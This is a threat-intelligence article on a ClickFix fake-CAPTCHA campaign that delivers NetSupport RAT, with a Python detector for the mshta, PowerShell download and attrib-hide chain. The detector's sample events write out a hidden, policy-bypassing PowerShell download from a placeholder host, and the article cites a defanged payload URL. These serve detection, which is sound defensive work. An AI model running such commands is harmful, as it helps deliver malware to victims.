NetSupport RAT Campaign Expands with ClickFix Technique
A malware campaign built on fake CAPTCHA pages persists, with eSentire reporting sustained activity throughout January 2025. The campaign, active since at least August 2024, uses deceptive CAPTCHA prompts to deliver NetSupport RAT. In January, eSentire observed NetSupport RAT being distributed through the ClickFix Initial Access Vector (IAV), which tricks users into copying and executing commands under the guise of CAPTCHA verification. Previous reports indicate the same campaign has also delivered the Lumma Stealer information-stealing malware, which in turn facilitated the installation of NetSupport RAT. The continued use of NetSupport RAT reinforces the campaign's effectiveness and its persistence into 2025.
The infection chain begins with 'mshta.exe' executing a remote HTML application (HTA) that presents the CAPTCHA lure. The HTA then runs a malicious PowerShell command to download the NetSupport RAT payload. A common trend observed by eSentire is that the initial file masquerades as an image, carrying a ".png" extension. One example payload was retrieved from "fbinter[.]com/a/b.png", a seemingly innocuous image URL chosen to evade detection at the URL level; the extension says nothing about the content actually served. Once the payload is on disk, 'cmd.exe' is invoked to run 'attrib.exe', modifying file attributes so the downloaded payload is hidden on the victim's system. The use of mshta.exe for initial execution, PowerShell for payload retrieval, and 'attrib.exe' for file manipulation aligns with the tactics previously reported in this campaign.
Concerns with NetSupport RAT stem from its remote control capabilities, including screen monitoring, input manipulation, file exfiltration, and the deployment of additional payloads. This campaign's reliance on living-off-the-land binaries (LOLBINs) follows a predictable sequence, from 'mshta.exe' launching a remote script, to PowerShell executing an obfuscated download command, to 'attrib.exe' hiding the result; because each binary is legitimate and signed, it is the parent-child sequence rather than any single process that provides a clear pattern for identifying malicious activity. The continued activity reported by eSentire highlights the evolving nature of this campaign and its dependence on deceptive social engineering to facilitate malware delivery.
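The mshta to PowerShell to attrib.exe sequence described in the two paragraphs above lends itself to lineage-based detection rather than single-event alerting. The following is an added example, not code from eSentire or from the original report: it correlates process-creation events by parent PID, flags 'mshta.exe' launched with a remote URL, then looks among its descendants for a PowerShell download (with an extra flag when the URL ends in an image extension, as with the ".png" lure) and an 'attrib +h' call. The sample events, PIDs and the placeholder host example.invalid are constructed for illustration and are not indicators from the campaign.

```python
"""Detect the mshta.exe -> PowerShell download -> attrib.exe hide chain
over process-creation events (constructed sample, not real telemetry)."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample events in (pid, ppid, image, command line) form.
# PID 300 starts the malicious chain; PID 600 is a benign local HTA for contrast.
SAMPLE_EVENTS = [
    Event(100, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    Event(200, 100, r"C:\Program Files\Mozilla Firefox\firefox.exe", "firefox.exe"),
    Event(300, 200, r"C:\Windows\System32\mshta.exe",
          "mshta https://example.invalid/verify/captcha.hta"),
    Event(400, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          'powershell -w hidden -ep bypass -c "iwr http://example.invalid/a/b.png '
          r'-OutFile $env:TEMP\b.png"'),
    Event(500, 400, r"C:\Windows\System32\cmd.exe",
          r"cmd /c attrib +h +s C:\Users\u\AppData\Local\Temp\b.png"),
    Event(600, 100, r"C:\Windows\System32\mshta.exe",
          r"mshta C:\Program Files\Vendor\installer.hta"),
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
IMAGE_EXT_RE = re.compile(r"\.(png|jpe?g|gif|bmp)(\?|$)", re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)",
    re.IGNORECASE)
ATTRIB_HIDE_RE = re.compile(r"\battrib(\.exe)?\b.*\+h", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def is_descendant(ev: Event, ancestor_pid: int, by_pid: dict) -> bool:
    """Walk the parent chain from ev; True if ancestor_pid is reached."""
    seen = set()
    cur = ev.ppid
    while cur in by_pid and cur not in seen:
        if cur == ancestor_pid:
            return True
        seen.add(cur)
        cur = by_pid[cur].ppid
    return False


def detect_clickfix_chains(events) -> list:
    """Return one finding per mshta.exe process launched with a remote URL,
    listing which later stages of the chain were observed beneath it."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for root in events:
        if basename(root.image) != "mshta.exe":
            continue
        url = URL_RE.search(root.cmdline)
        if not url:
            continue  # local HTA: not the remote-lure pattern
        stages = ["mshta_remote"]
        for child in events:
            if not is_descendant(child, root.pid, by_pid):
                continue
            name = basename(child.image)
            if name in ("powershell.exe", "pwsh.exe") and DOWNLOAD_RE.search(child.cmdline):
                if "powershell_download" not in stages:
                    stages.append("powershell_download")
                dl = URL_RE.search(child.cmdline)
                if dl and IMAGE_EXT_RE.search(dl.group(0)) and "image_masquerade" not in stages:
                    stages.append("image_masquerade")
            if ATTRIB_HIDE_RE.search(child.cmdline) and "attrib_hide" not in stages:
                stages.append("attrib_hide")
        findings.append({"mshta_pid": root.pid, "remote_hta": url.group(0), "stages": stages})
    return findings


if __name__ == "__main__":
    for f in detect_clickfix_chains(SAMPLE_EVENTS):
        print(f)
```

Walking the parent chain rather than matching only direct parent-child pairs matters here because 'attrib.exe' is typically launched via 'cmd.exe', one hop below PowerShell; a rule keyed on immediate parent would miss that stage. A single 'mshta_remote' stage is itself worth triage, while a finding that reaches 'attrib_hide' should be treated as a likely completed infection.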